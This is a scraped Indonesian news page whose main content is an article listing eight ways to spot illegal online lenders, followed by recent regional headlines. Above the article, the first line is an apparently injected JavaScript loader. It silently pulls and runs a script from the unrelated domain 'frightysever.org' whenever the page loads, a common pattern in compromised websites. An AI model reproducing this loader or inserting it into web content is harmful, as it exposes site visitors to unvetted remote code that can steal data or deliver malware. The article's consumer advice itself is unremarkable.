(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Ekonomi

Ini 8 Langkah Waspada dan Mengenali Pinjol Ilegal


KANALKALIMANTAN.COM, BANJARMASIN – Mewaspadai pinjaman online ilegal sangat penting untuk melindungi kita dari penipuan dan praktik yang merugikan.

Berikut adalah beberapa langkah yang dapat kamu ambil untuk mewaspadai pinjaman online ilegal:

  1. Periksa Lisensi dan Regulasi

Pastikan bahwa penyedia layanan pinjaman online memiliki lisensi yang sah dan diatur oleh otoritas jasa keuangan (OJK). Kita dapat memeriksa lisensi dan regulasi mereka melalui situs web otoritas keuangan atau lembaga pengawas yang relevan.

  1. Perhatikan Suku Bunga dan Biaya

Waspadai pinjaman online dengan suku bunga yang tidak masuk akal atau biaya tersembunyi yang tinggi. Pinjaman dengan biaya yang tidak transparan atau tidak sesuai dengan standar pasar mungkin merupakan tanda adanya praktik ilegal.

Baca juga: Waspada Pinjaman Online, OJK Kalsel: Pinjol Ilegal Cenderung Beri Kemudahan Diawal

  1. Baca Syarat dan Ketentuan dengan Seksama

Selalu baca dengan teliti syarat dan ketentuan pinjaman sebelum menyetujuinya. Pastikan memahami semua biaya, jangka waktu pinjaman, dan kewajiban lainnya yang terkait dengan pinjaman tersebut.

  1. Waspadai Penawaran yang Terlalu Baik untuk Dijadikan Kenyataan

Jika penawaran pinjaman terdengar terlalu bagus untuk menjadi kenyataan, maka mungkin ada yang salah. Hindari pinjaman dengan janji-janji yang tidak realistis atau penawaran yang terlalu menggiurkan.

  1. Periksa Reputasi dan Ulasan

Lakukan riset tentang reputasi penyedia layanan pinjaman online. Periksa ulasan dari konsumen sebelumnya dan cari informasi tentang pengalaman orang lain dengan penyedia tersebut. Jika banyak laporan negatif atau keluhan, itu bisa menjadi tanda bahaya.

  1. Perhatikan Tanda-tanda Peringatan

Baca juga: LPTQ HSU Membidik Tiga Besar MTQ ke-35 Kalsel di Tapin

Waspadai tanda-tanda peringatan seperti penagihan yang agresif, permintaan informasi pribadi yang tidak biasa, atau tekanan untuk membuat keputusan cepat tanpa waktu untuk mempertimbangkan pilihan dengan matang.

  1. Gunakan Situs Web Resmi

Selalu akses situs web resmi penyedia layanan pinjaman online melalui URL yang sah dan pastikan bahwa situs tersebut aman (ditandai dengan kunci gembok di bilah alamat browser).

  1. Waspadai Pemalsuan Identitas atau Penipuan

Jangan pernah memberikan informasi pribadi atau keuangan sensitif melalui email, pesan teks, atau panggilan telepon yang tidak diminta. Waspadai tanda-tanda penipuan identitas atau praktik penipuan lainnya.

Baca juga: Jurnalis dan Pers Kampus Dibekali Cek Fakta Gunakan Tools Google

Jika memiliki kecurigaan bahwa suatu pinjaman online mungkin ilegal, segera hentikan interaksi dengan penyedia layanan dan laporkan kegiatan yang mencurigakan kepada otoritas yang berwenang. (Kanalkalimantan.com/rizki)

Reporter: rizki
Editor: bie

 


Risa

Recent Posts

Peternakan Babi Dekat Kampus UIN Antasari di Guntung Manggis Dikeluhkan

Pemilik Ternak Diminta Datang ke Kantor Satpol PP Banjarbaru Read More

3 jam ago

Rekayasa Pemasangan ATSC, Jalan Pangeran Suriansyah Steril Parkir dan PKL

KANALKALIMANTAN.COM, BANJARBARU - Kawasan pinggir jalan maupun median di Jalan Pangeran Suriansyah, Kota Banjarbaru, Kalimantan… Read More

5 jam ago

Pj Bupati HSU Resmikan TMMD ke-120 di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan secara resmi membuka… Read More

6 jam ago

Sekat Bakar Antisipasi Karhutla Ring 1 Bandara Syamsudin Noor

KANALKALIMANTAN.COM, BANJARBARU - Provinsi Kalimantan Selatan kembali memfokuskan penanganan ancaman kebakaran hutan dan lahan (Karhutla)… Read More

6 jam ago

Buaya di Pelambuan Banjarmasin Gagal Ditangkap, Tiga Kali Terlihat Warga Muncul

KANALKALIMANTAN.COM, BANJARMASIN - Kemunculan seekor buaya di kawasan sungai Kelurahan Pelambuan, Kecamatan Banjarmasin Utara, Kota… Read More

10 jam ago

Ambulans Baru Layanan Puskesmas Keliling di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU – Dinas Kesehatan (Dinkes) Kota Banjarbaru hadirkan layanan kesehatan yang lebih dekat dengan… Read More

10 jam ago

This website uses cookies.